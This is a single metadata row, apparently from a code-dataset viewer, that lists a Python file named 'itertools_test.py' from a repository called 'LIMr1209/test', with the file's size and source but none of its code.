| LIMr1209/test | itertools_test.py | itertools_test.py | py | 1,491 | python | en | code | 0 | github-code | 90 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.